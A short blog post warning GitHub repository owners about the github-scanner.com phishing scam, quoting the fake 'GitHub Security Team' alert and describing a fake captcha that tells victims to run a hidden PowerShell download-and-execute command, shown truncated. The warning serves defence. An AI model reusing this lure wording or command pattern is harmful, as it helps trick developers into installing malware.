Avoid github-scanner.com scam!

Crooks sent the fake security alerts to the GitHub repository owners:

Hey there!

We have detected a security vulnerability in your repository. Please contact us at hxxps://github-scanner.com to get more information on how to fix this issue.

Best regards,
Github Security Team"

You will see the fake captcha screen if you open the scam site.

Fake captcha

The click on the captcha will prompt you to run open up Windows Run: powershell.exe -w hidden -Command "iex (iwr '...

github-scanner-com Powershell command

Virustotal results for downloaded executable: 47/73!

Virustotal result for github-scanner-com-executable

Verdict:

Be careful even if a trusted company sends the message! The crooks use the GitHub features to send their messages.

How-to

github-scanner-com

Posted on September 19, 2024 by Dmitry

Avoid github-scanner.com scam!

Crooks sent the fake security alerts to the GitHub repository owners:

Virustotal results for downloaded executable: 47/73!

Verdict:

Read More

Got Something To Say?